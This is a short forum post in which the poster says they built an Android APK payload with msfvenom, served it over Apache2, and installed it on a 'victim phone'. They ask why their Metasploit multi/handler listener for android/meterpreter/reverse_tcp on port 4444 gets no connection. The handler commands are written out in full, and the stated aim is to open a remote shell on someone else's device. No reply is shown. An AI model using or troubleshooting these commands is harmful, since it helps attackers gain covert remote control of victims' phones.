Android hack using msfvenom

Hi guys, I have problem, I build android app apk with msfvenom and use Apache2 web service

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost my machine kali attacker by (cmd ifconfig)

set lport 4444

exploit

I do everything as well and install apk in victim phone :iphone: but doesn’t work, I also search in google so many people have this problem, any advice!?!? Thanks

This topic was automatically closed 3 days after the last reply. New replies are no longer allowed.